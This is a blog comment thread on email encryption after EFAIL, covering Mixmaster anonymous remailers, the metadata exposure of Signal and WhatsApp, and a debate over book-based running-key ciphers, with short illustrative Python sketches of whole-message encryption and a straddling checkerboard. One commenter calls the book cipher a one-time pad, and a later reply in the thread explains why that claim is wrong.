As you already mentioned, confidentiality isn’t only about concealing a message’s payload. It’s even more important to hide the identity of sender and recipient. That’s the simple reason why WhatsApp finally followed the users’ mood and implemented end-to-end encryption: it’s all about metadata, about building a sociogram of the world’s population. And we, the users, settle back, enjoying some obscure undisclosed encryption implementation, and still accept the upload of our address books and the tracing of our transactions unchallenged.

As neither Signal nor WhatsApp supports anonymous communication, that’s not the way to go. Now, more than ever before, we need decentralized mail messaging, not the concentration of a few servers run by Whisper Systems and Facebook, which is easily interceptable by privacy opponents. It’s stupid to think accounts bound to phone numbers can remain anonymous for any length of time; mobile phone tracking may immediately reveal your identity.

Talking about

Tor or “mix-net”

you wrote

So your assumption that “confidentiality” is available to the general public is currently incorrect…

which I think isn’t correct. Sure, Tor has to provide low latency, which leaves it prone to correlation attacks, and that indeed is a problem. But what’s wrong with high-latency mix networks like Mixmaster?

There’s unrestricted code transparency from the Mixmaster server up to the client-side OmniMix proxy. You can send messages through the integrated Tor subsystem without anyone having a chance to notice it. And those in need of an anonymous reply channel may create an account at a nym server.

Of course, to get maximum security, a packet filter has to disconnect gabby MUAs from the internet, only allowing them to communicate through the local proxy server.

So, as core PGP/GPG is in no way broken, and an infrastructure for secret conventional mailing is publicly available, I was startled by Bruce Schneier recommending Signal and WhatsApp.


@ gmgj

A little off topic, but, I would be really happy if a few really smart guys got some backing to do a new email framework, standard, what you may call it along with some open source libraries.

MIME encoding itself is already very complex and challenging to implement. Now add partial encryption, HTML processing, and possibly some further active content, and there is no longer a chance of preventing the dam from bursting. That’s where we are now.

But what’s the reason why single message parts have to be encrypted one by one? Isn’t it much more robust to encrypt the message as a whole, hiding, and by doing so protecting, the integrity of its complete contents and structure, including the header and body sections, which is what the aforementioned Mixmaster proxy does? I think we have to return to the KISS principle instead of making message processing more and more complex and unpredictable.

Let the MUA build the MIME message, then strip off all revealing header data, encode the result and send that single PGP block to the recipient(s). That’s easy, that’s transparent, that’s what we need.
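A minimal sketch of this “encrypt the whole message” idea using Python’s standard email library. The `encrypt()` function here is only a stand-in (base64, so the example runs anywhere); a real implementation would call GnuPG or another OpenPGP library, and this is not how the Mixmaster proxy is actually implemented — the addresses and subject are made up for illustration:

```python
# Sketch: build the full MIME message, then expose only what transport
# needs; everything else (headers included) travels inside one opaque blob.
from email.message import EmailMessage
import base64

def encrypt(blob: bytes) -> bytes:
    # Placeholder standing in for real PGP encryption.
    return base64.b64encode(blob)

inner = EmailMessage()
inner["Subject"] = "Quarterly numbers"   # revealing header, will be hidden
inner["From"] = "alice@example.org"
inner["To"] = "bob@example.org"
inner.set_content("The figures are attached.")

# Headers, structure, and body are encrypted as one unit.
ciphertext = encrypt(inner.as_bytes())

outer = EmailMessage()
outer["From"] = "alice@example.org"      # only what transport needs
outer["To"] = "bob@example.org"
outer.set_content(ciphertext.decode("ascii"))

print("Subject" in outer)  # False: the subject travels only inside the blob
```

The point of the design is visible in the last line: nothing revealing survives in the outer envelope, so there is no partially encrypted structure for an EFAIL-style gadget to wrap itself around.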

Clive Robinson May 27, 2018 7:13 PM

@ Ron Dam,

But what’s wrong with high latency mix networks like Mixmaster?

Some years ago I looked at Type II and Type III anonymous remailer systems, but they appeared to have been abandoned by their developers. Which is why I said “not currently”.

I just had another look and it appears that the last releases of both Mixmaster and Mixminion are over a decade old…

If you know of more current anonymous remailers can you post a link?

Ron Dam May 28, 2018 6:57 AM

@ Clive Robertson

Well, the former Mixmaster sites @ SourceForge ( and, which still appear on top of search engine listings, were abandoned years ago. They should have added remarks to make that situation clear and point prospective users to the active development branch.

Now “Elvis” / “Merkin Muffley” and Steve Crook / “Zax” maintain the Mixmaster source code and upgraded it from 1k to 4k RSA encryption (

Steve Crook’s GitHub repository also holds nym server sources (ghionym and nymserv).

Nowadays the Mixmaster network runs in hybrid mode with maximum chain lengths ranging from 10 (4k only) up to 20 remailer hops (1k only) with currently 15 worldwide deployed Mixmaster remailers being active. Anonymous mailboxes are available at, (ghionym / Ghio style) and (nymserv / Zax style).

Apart from Linux scripts for automation there’s the OmniMix SMTP/POP3/NNTP proxy server running on Windows and the much simpler Quicksilver Lite Windows GUI.

Remailer topics are discussed at the alt.privacy.anon-server newsgroup. That’s where you find the maintainers of all the tools I mentioned.

IMO the Mixmaster network is the most secure system for anonymous communication we currently have.

Clive Robinson May 28, 2018 2:45 PM

@ Ron,

First off you have my surname wrong…

Second, it’s odd you should mention the name “Steve Crook”; in fact it is a bit of a surprise. It’s not a very common name, and I only know of two who are also developers of communications code.

The first used to work at a university I worked at, and when I moved I set up the opportunity for him to work at a new company I worked at, then in London, and he was still working there long after I was gone.

The other developer lives in St Mellion and was a parish councillor there who was involved with the rejection of a solar farm application. Solar energy systems being a previous “special interest” of mine, I ran into his paperwork though not him, and various organisations had profiled him and the other councillors, as at the time Cornwall, being in the far South West of the UK, was ideal for “alternative energy” sites due to both wind and sunshine.

I will have a look at the newer software and see how many points it scores not just on information confidentiality, but also meta-data confidentiality from the likes of traffic analysis.

Lio Fralop June 2, 2018 6:44 PM

Use Signal or Whatsapp? Are you kidding? “Reliably and easily encrypting e-mail is an insurmountably hard problem”? Only a Sith deals in absolutes, Bruce.

nipper June 6, 2018 1:55 AM

Call me old fashioned, but from my cypherpunk days c.1993, I use nyms and the type II mixmaster network.

Robert Scott May 21, 2019 6:51 PM

None of the comments I have read discuss the very best form of encryption for two entities to communicate securely, whether using electronic communications or plain old snail mail.

Now this is OLD spycraft, but it has never been broken, unless one or other party has their property seized and some nitwit has marked a page of the key book.

Gideons Bibles, for instance, are in every motel room across most of the Western world. Similarly, there are other commonly available, exactly duplicated books in libraries.

Two entities agree on a series of books that they enjoy reading, perhaps one book for each day of a week, or even each day of a month. An ordinary message header in an email might mention, and even discuss, a citation from a book which is NOT one of the ones chosen as a key book. The key is a paragraph of text, with just the first, second or third letter from each word being used to create a one-time pad to encrypt an email message before it is ever entered into the email application. This pattern is never repeated, which means both entities have to have half a clue; but they should, because they are working in a dangerous realm, otherwise why worry about encrypting emails in the first place?
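The key-derivation step described above can be sketched in a few lines: the first letter of each word of the agreed paragraph becomes the key stream, which is then added to the plaintext mod 26. The verse and message here are purely illustrative; note that if the key is shorter than the message this code repeats it, and that a book-derived stream is a running-key cipher rather than a true one-time pad (a distinction taken up later in the thread):

```python
# Sketch of the book-paragraph running key: first letter of each word
# forms the key stream; encryption is letter-wise addition mod 26.
import string

def key_stream(paragraph: str, letter_index: int = 0) -> str:
    words = [w.strip(string.punctuation) for w in paragraph.split()]
    return "".join(w[letter_index].upper() for w in words
                   if len(w) > letter_index and w[letter_index].isalpha())

def shift(text: str, key: str, sign: int) -> str:
    # sign=+1 encrypts, sign=-1 decrypts; text must be A-Z only
    out = []
    for i, c in enumerate(text):
        k = ord(key[i % len(key)]) - ord("A")
        out.append(chr((ord(c) - ord("A") + sign * k) % 26 + ord("A")))
    return "".join(out)

key = key_stream("In the beginning God created the heaven and the earth")
ct = shift("MEETATNOON", key, +1)
assert shift(ct, key, -1) == "MEETATNOON"   # round-trips
print(ct)  # UXFZCMUOHR
```

Swapping `letter_index` to 1 or 2 gives the “second or third letter” variants of the same scheme.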

You write up your message, avoiding EVER reusing a phrase that may be known to be used by either entity. For instance, “Heil Hitler” at the end of every ciphered message sent by the Germans during WWII: you know that it is there, and you know what it says, so now you can reverse the key from the pattern. Don’t sign the message in any way with a pattern like “Sincerely Yours” or other garbage like it; it creates a known pattern at a known position in the message, from which the key can be reversed. Even ending telegrams with “Message Ends XXX” is stupid.

Anyway, you never carry the key book or books in your baggage. You check the book out of a library along with two or three others completely unrelated to your messaging system. You encode a message with a book-and-citation header unrelated to the real book you are using, so that throws off the scent. You decode any message in the same (yes, cumbersome) way. Magazines available at newsstands can also be used, but only ones that don’t change their publication for different regions, publishing only one version.

If you are working against authoritarian regimes and up against the best signals intelligence services in the world, you have to think about which methods of secure communication worked in the past and were never beaten unless a mistake was made –like being seen meeting with someone already under suspicion by the regime, and then being caught in possession of one of the key books– which is why I mentioned books and magazines that are readily available.

Yes it is cumbersome, but one-time-pads have never been broken.

Weather May 21, 2019 11:12 PM

Robert Scott
A book isn’t the right thing to use. Alphabetic syntax –like a “u” after a “q”– and stock phrases like “this is” or “this might” have enough pattern to narrow things down a lot. Look at a dictionary: the first and second letters of each word can remove a lot from a brute-force search, making a dictionary attack feasible. Also, there are 256 symbol values available for communication but you are only using 26, so some processing of the text towards randomness is needed before you substitute.

Anna Williams January 15, 2020 12:20 AM

Hi Mr. Schneier,

If an organization wants to set up a secure email service so that they can transmit classified messages securely via e-mail, as an alternative to PGP, what do you recommend? Or would you recommend PGP combined with other network-hardening techniques? I am envisioning using a VPN for sure, just to connect to the network… if it were a remote site.

A while back I was reading the whitepaper for WhatsApp’s encryption protocols. I did not know they were open source. Maybe that protocol suite can be applied to a secure email service. Thoughts?



Clive Robinson January 15, 2020 7:01 AM

@ Robert Scott,

Yes it is cumbersome, but one-time-pads have never been broken.

The single-book “running key” polyalphabetic cipher you describe is most certainly not a “one-time pad” and never has been. Its statistics are not at all random, because of the multilevel nature of the redundancy in written language. Worse, the actual key space, whilst appearing insurmountably large to a human, is actually relatively small for modern computers. That is, 100 million books is only about 2^27, and due to human failings there are probably only about 2000 start points (page, paragraph) per book, giving a key space of a paltry 2^38. Worse, you don’t have to brute-force them, because you can “chunk” common combinations of words and run them against the ciphertext. The chunks act like one to several indexes, thus significantly reducing the search space.

Thus the usual form of just using a starting position in a book and writing it out to use as the key usually falls to an automated chi-squared test against such a “canon of known text”.

The problem is that the statistics hold not just for plain text but for “sampled plaintext” as well, and are fairly well known and consistent. That is, regular sampling of words by character position has a fairly clear statistical profile. Realistically, because words are fairly short, the number of sampling strategies is very limited (maybe four bits’ equivalent). So the keystream search space is likely to be within 2^42, and searching is reduced significantly by chunking (especially if the base chunks can all be held in fast memory such as CPU cache).
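The back-of-the-envelope keyspace figures above check out:

```python
# Verify the keyspace estimates: 100 million books, ~2000 start points
# per book, and ~4 bits' worth of sampling strategies.
import math

books = 100_000_000
starts = 2000
sampling = 16  # ~four bits of sampling strategies

print(round(math.log2(books)))                      # 27
print(round(math.log2(books * starts)))             # 38
print(round(math.log2(books * starts * sampling)))  # 42
```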

Such “chunking”, which human cryptanalysts do, is why statistical flattening by a simple look-up table (the straddling checkerboard[1]), converting the plaintext character by character to a single- or double-digit number, was used by many of the Nihilist ciphers, including VIC (which did remain unbroken during its period of use, 1953-1957, whilst the one-time pad did not: see Project VENONA, which is a reason to use other ciphers in the process as well).

Back in the 1980s, when computing power and storage were considerably less than they are today, it was suggested that using four books to generate the running key was probably sufficient. First converting them to numbers via four different straddling checkerboards would certainly increase the fractionation and suppress the statistics of the language, but it would be a lot of work and very likely to be subject to errors.

Thus if you are going to use book-derived running-key ciphers, it would be best to perform a transposition of reasonable size in the process, as it would make brute-force keyspace-reduction techniques such as “chunking” much less likely to work. One advantage is that, as with all stream ciphers, the key stream is independent of the message being sent, so the transposition can be done in an irregular manner: that is, by using in effect a grid where around 10% of the grid squares are unused, in a key-dependent fashion. In effect this makes a ten-character transposition into one of around ninety before the pattern repeats. If this is done before using the straddling checkerboard, the fractionation will make the actual transposition size harder to find.

[1] The straddling checkerboard for most languages that use a Latin alphabet uses a three-line by ten-character grid, rather than the five-by-five or six-by-six of a Polybius square. Importantly, the eight most frequent letters of the alphabet go on the top line, with two grid spaces left empty. The other eighteen letters of the alphabet and two “special” characters are written in the bottom two rows. The positioning of the individual characters is “key dependent”. The digits 0-9 label the grid columns; the top row is not numbered, and the bottom two rows are numbered with the column numbers of the two blank grid squares in the top row. The plaintext characters are converted to one- or two-digit numbers: if a character is in the top row, only its column number is written down; if it is in either of the other two rows, both the row and column numbers are written down. This has the advantage not just of simultaneously achieving fractionation but also of slightly compressing the plaintext, thus raising its unicity distance. Depending on how the following cipher steps work, the fractionation can lead to good diffusion and confusion, the two properties Claude Shannon emphasised as critical to the strength of a cipher.
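The footnote’s construction can be sketched directly. The layout below is one concrete example only (in practice the arrangement is key-dependent): eight frequent letters sit on the unnumbered top row with blanks under columns 2 and 6, and the remaining eighteen letters plus “.” and “/” fill the rows labelled 2 and 6:

```python
# A concrete straddling checkerboard. Spaces in TOP mark the two blank
# cells, whose column numbers (2 and 6) label the bottom two rows.
TOP = "AT ONE SIR"
ROWS = {"2": "BCDFGHJKLM", "6": "PQUVWXYZ./"}

ENC = {}
for col, ch in enumerate(TOP):
    if ch != " ":
        ENC[ch] = str(col)                # top row: one digit
for row, letters in ROWS.items():
    for col, ch in enumerate(letters):
        ENC[ch] = row + str(col)          # lower rows: row label + column

DEC = {v: k for k, v in ENC.items()}

def encode(text: str) -> str:
    return "".join(ENC[c] for c in text.upper())

def decode(digits: str) -> str:
    out, i = [], 0
    while i < len(digits):
        if digits[i] in ROWS:             # 2 or 6 announces a two-digit code
            out.append(DEC[digits[i:i + 2]])
            i += 2
        else:                             # any other digit is a top-row code
            out.append(DEC[digits[i]])
            i += 1
    return "".join(out)

ct = encode("ATTACK")
assert decode(ct) == "ATTACK"
print(ct)  # 01102127
```

Decoding is unambiguous because the digits 2 and 6 never appear alone as top-row codes; they always announce a two-digit pair. Note also the compression the footnote mentions: six letters become only eight digits.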

whatever October 4, 2020 12:34 AM

WhatsApp collects metadata, and even Signal is centralised. PGP is great because it’s decentralised and serves a completely separate purpose.
